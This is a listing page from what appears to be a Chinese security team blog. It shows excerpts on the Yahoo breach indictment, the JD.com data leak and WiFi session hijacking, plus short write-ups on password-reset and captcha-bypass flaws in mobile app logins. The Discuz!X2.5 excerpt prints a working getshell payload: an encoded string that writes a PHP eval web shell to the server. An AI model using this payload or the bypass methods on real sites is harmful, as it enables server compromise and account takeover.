14x Security Team

展开菜单
首页 > Welcome to visit friends

美司法部起诉俄罗斯间谍 因其对雅虎发动黑客攻击

美司法部起诉俄罗斯间谍 因其对雅虎发动黑客攻击
美国检方对4名犯罪嫌疑人提出47项指控,其中包括共谋、计算机欺诈和接入设备欺诈。所有指控都与2014年针对雅虎的一次网络攻击活动有关,5亿名雅虎用户的个人信息被窃取,其中包括姓名、电子邮件地址、经过加密的密码等。雅虎2016年发现并公布了这次网络攻击活动,当时称这次攻击是由“国家赞助”的黑客发动的。当时安全研究人员对这一说法有争议,现在来看似乎是正确的。当然,俄罗斯卷入针对美国科技公司的网络攻击活动并不让人感到意外。过去,美国司法部就曾指控俄罗斯黑客的网络犯罪活动。去年美国总...
/ 796 次浏览/ 业界新闻

团队简介

团队简介
团队简介Team briefing team is mainly composed of 21 members of public welfare websites, who work for major domestic security companies and rarely speak....
/ 1257 次浏览/ 未命名

一次APK登录系统逻辑任意密码重置漏洞分析

一次APK登录系统逻辑任意密码重置漏洞分析
一次APK登录系统逻辑任意密码重置漏洞分析     作者:0x80目标:\\最近很少写文章、今天就带来一篇原理:      通过手机下载APK软件,由于找回密码参数的telephone未进行有效过滤, 可使用任何手机号码发送验证码截取数据包、在重置更新密码的、同时改掉telephone为任何号码,即可成功重置密码,如号码13888888888我们看到两个参数、这时候可以忽略PASSWORD,APK注入也尝试...
/ 1618 次浏览/ 网络安全

攻陷某网站后台+APK截取COOKIE思路

攻陷某网站后台+APK截取COOKIE思路
攻陷某网站后台+APK截取COOKIE思路              作者:0x80各种爆破,POST,都无用,这时候,不知道密码怎么办?但是通过另外一个点下载APK,在登录接口尝试截取SESSION果然,成功了{"client_authc_name":"XXXX","client_authc_va...
/ 1253 次浏览/ 网络安全

攻陷某APK后台(接口的隐患)

攻陷某APK后台(接口的隐患)
攻陷某APK后台(接口的隐患)                       作者:0x80Api的接口,APK后台密码完全不知道我们应该怎么办呢?触发上面这个按钮的 click 事件。通过手机截取发现一个重要的地址,爬到一个接口类似一个测试接口看下代码就知道了 &nbs...
/ 1319 次浏览/ 网络安全

手机APK利用JSON绕过验证码登陆漏洞

手机APK利用JSON绕过验证码登陆漏洞
手机APK利用JSON绕过验证码登陆漏洞        作者:0x80这个思路简单讲讲网站系统中我们明显看到了这样一段很明显是加过密的这样就能够难到我们吗,有的人可能想到了验证码爆破这个网站验证码6位,随便做一个就是上百万的字典,完全没必要其实我们通过网站系统对应的APK接口同样也做一次这样的动作、然后展开JSON我们发现了猫腻,可以发现网站系统验证码虽然加密了但是APK并没有加密,直接绕过登录...
/ 2136 次浏览/ 网络安全

企业ERP系统面临的网络安全威胁

企业ERP系统面临的网络安全威胁
企业ERP系统面临的网络安全威胁一、ERP系统信息安全威胁安全问题的产生是一个非常复杂的问题,包含了多种因素的相互作用。总结起来,企业ERP系统所面临的信息安全威胁主要包括来自以下几个方面的内容:(一)ERP网络应用的威胁。来自网络层面的威胁主要来自远程访问企业内部系统所造成的信息泄漏隐患。随着企业规模的不断扩展,对外的销售和物流网络也随之扩大,出差的业务员和某些客户经常需要在异地远程访问企业网络资源。为此,ERP专门提供了B/S的访问模式,使得异地用户能够使用浏览器通过虚拟...
/ 1378 次浏览/ 业界新闻

Discuz!X2.5 Release20120407版命令执行漏洞Getshell

Discuz!X2.5 Release20120407版命令执行漏洞Getshell
Discuz!X2.5 Release20120407版命令执行漏洞Getshell利用方法1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志,论坛根目录下生成demo.php,一句话密码C...
/ 3573 次浏览/ 业界新闻

“WIFI可破解 5分钟控制用户微博”追踪

“WIFI可破解 5分钟控制用户微博”追踪
“WIFI可破解 5分钟控制用户微博”追踪家中WIFI五分钟“劫持”网内账户实验目的:测试家中WIFI内,利用黑客软件是否可以“劫持”其他网内用户资料。实验背景:在同一WIFI网内,“Evi1m0”使用一款黑客软件对另一台电脑上已登录的微博账号实施“劫持”,成功控制该微博账号的演示。实验过程:按照“Evi1m0”的演示步骤,记者首先找来一台已经越狱的智能手机,将两款必备的黑客软件安装进手机。随后,记者将手机接入家中的WIFI,同时接入一台IP尾号为119的电脑,并在电脑上登入...
/ 1245 次浏览/ 业界新闻

京东信息泄露12G用户数据泄露 源自2013年Struts 2漏洞

京东信息泄露12G用户数据泄露 源自2013年Struts 2漏洞
京东信息泄露12G用户数据泄露 源自2013年Struts 2漏洞一本财经”昨日发布文章《京东数据疑似外泄:超过12个G,涉及数千万用户》,称最近黑市上有一12G的数据包开始流通,其中包括用户名、密码、邮箱、QQ号、电话号码、身份证等多个维度,数据多达数千万条。黑市买卖双方表示这些数据来自京东,而京东表示正紧急核实数据真伪。目前,京东得出初步结论。2013年7月的Struts 2漏洞CVE-2013-2251京东表示,经其信息安全部门依据报道内容初步判断,该数据源于2013年...
/ 1197 次浏览/ 业界新闻
‹‹ 31 32 33 34 ››